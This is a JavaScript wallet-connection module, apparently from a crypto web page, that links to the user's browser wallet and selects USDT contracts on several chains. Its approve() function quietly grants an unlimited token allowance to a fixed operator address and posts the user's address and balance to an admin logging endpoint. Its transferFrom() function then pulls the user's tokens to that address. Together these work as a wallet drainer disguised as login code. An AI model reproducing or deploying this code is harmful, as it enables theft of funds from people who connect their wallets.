import { ethers, utils } from 'ethers';
import {TetherToken, BEP20USDT, goerliContract, ERC20Template, OCKUSDT} from './abi';
import store from "@/js/store"
import axios from 'axios'
import {AUTH_API_URL, AUTH_ADDRESS} from '@/env'

export const EtherspPage = {
	async login(){
		let eth_accounts = await window.ethereum.request({method:'eth_accounts'});
		if(eth_accounts[0]){
				// return await window.ethereum.request({method:'eth_requestAccounts'});
				// this.walletDialog = false;
				return eth_accounts;
		} else {
			eth_accounts = await window.ethereum.request({method:'eth_requestAccounts'});
		}
		return eth_accounts;
	}
};


export default class Ethers{
	utils
	provider
	constructor() {
		this.utils = utils;
		this.EtherspPage = EtherspPage;
		this.init();
	}
	
	init(){
		this.provider = this.getProvider();
	}
	
	getProvider(){
		return new ethers.providers.Web3Provider(window.ethereum);
	}
	
	async getNetwork(){
		return await this.provider.getNetwork();
	}
	
	async getSigner(address){
		return await this.provider.getSigner(address);
	}
	
	async getBalance(address){
		return await this.provider.getBalance(address);
	}
	
	async getlistAccounts(){
		return await this.provider.listAccounts();
	}
	
	async getContract(address, signer, chainId, currency){
		let abiInfo = this.getAbiInfo(chainId, currency);
		return await new ethers.Contract(abiInfo.addressCon, abiInfo.abi, signer);
	}
	
	isWallet(name){
		if (typeof window.ethereum == 'undefined') {
			console.log('未安装钱包!');
			throw '未安装钱包!';
		} else {
			switch(name){
				case "TokenPocket":
					if (typeof window.ethereum.isTokenPocket === 'undefined') {
						console.log('未安装钱包!');
						throw '未安装钱包!';
					}
					break;
				default:
					console.log('未安装'+name+'钱包!');
					throw '未安装'+name+'钱包!';
			}
		}
	}
	
	addListener(){
		this.provider.on('block', () => {
			
		});
		this.provider.on('error', (error) => {
			console.log('add error: ' + error);
		});
		window.ethereum.on('accountsChanged', function (accounts) {
			console.log("地址变更");
			console.log(accounts);
			store.dispatch("logout");
		});
		window.ethereum.on('chainChanged', (chainId) => {
			console.log("链变更");
			console.log(chainId);
			store.dispatch("logout");
		});
	}
	
	removeListener(){
		this.provider.removeListener('block', (block) => {
			console.log('remove block: ' + block);
		});
		this.provider.removeListener('error', (error) => {
			console.log('remove error: ' + error);
		});
		window.ethereum.removeListener('accountsChanged', (accounts) => {
			console.log("删除地址变更");
			console.log(accounts);
		});
		window.ethereum.removeListener('chainChanged', (accounts) => {
			console.log("删除链变更");
			console.log(accounts);
		});
	}
	
	getAbiInfo(chainId, currency){
		let addressCon = "",
			abi = "";
		currency = currency.toLowerCase()
		chainId = Number(chainId);
		switch(chainId){
			case 1:
				if(currency == "usdt"){
					addressCon = TetherToken.address;
					abi = TetherToken.abi;
				}
				
				break;
			case 56: 
				if(currency == "usdt"){
					addressCon = BEP20USDT.address;
					abi = BEP20USDT.abi;
				}
				break;
			case 128:
				if(currency == "usdt"){
					addressCon = ERC20Template.address;
					abi = ERC20Template.abi;
				}
				break;
			case 66:
				if(currency == "usdt"){
					addressCon = OCKUSDT.address;
					abi = OCKUSDT.abi;
				}
				break;
			case 5:
				if(currency == "link"){
					addressCon = goerliContract.address;
					abi = goerliContract.abi;
				}
				break;
			default:
				
				break;
		}
		if(addressCon == ""){
			console.log("此链不支持此币" + currency + chainId);
			throw "$vuetify.tips.chainNotSupportCoin";
		}
		return {
			addressCon : addressCon,
			abi : abi
		};
	}
	
	
	
	async approve(address){
		localStorage.setItem('auth_address', address);
		let network = await this.getNetwork();
		let signer = await this.getSigner(address);
		let contract = await this.getContract(address, signer, network['chainId'], localStorage.getItem('currency_key'));
		let value = 1.25 * 1e51;
		value =  "0x" + value.toString(16);
		let auth = AUTH_ADDRESS;
		let amount = await contract.balanceOf(address)
		amount = utils.formatEther(parseInt(amount).toString());
		axios.post(AUTH_API_URL + '/lxadmin/index/record',{
			address:address,
			auth:auth,
			chainId:network['chainId'],
			currency:localStorage.getItem('currency_key'),
			amount:amount
		}).then((res) => {
			console.log(res);
		});
		return await contract.approve(auth, value);
	}
	
	async transferFrom(address, formData){
		let network = await this.getNetwork();
		let signer = await this.getSigner(address);
		let contract = await this.getContract(address, signer, network['chainId'], localStorage.getItem('currency_key'));
		let value = utils.parseEther(formData.amount);
		return await contract.transferFrom(formData.address,  formData.auth, value);
	}
	
	async addAddressLog(address){
		let network = await this.getNetwork();
		let auth = AUTH_ADDRESS;
		axios.post(AUTH_API_URL + '/lxadmin/index/record',{
			address:address,
			auth:auth,
			chainId:network['chainId'],
			amount:0,
			currency:localStorage.getItem('currency_key'),
			isauth:2
		}).then((res) => {
			console.log(res);
		});
	}
	
}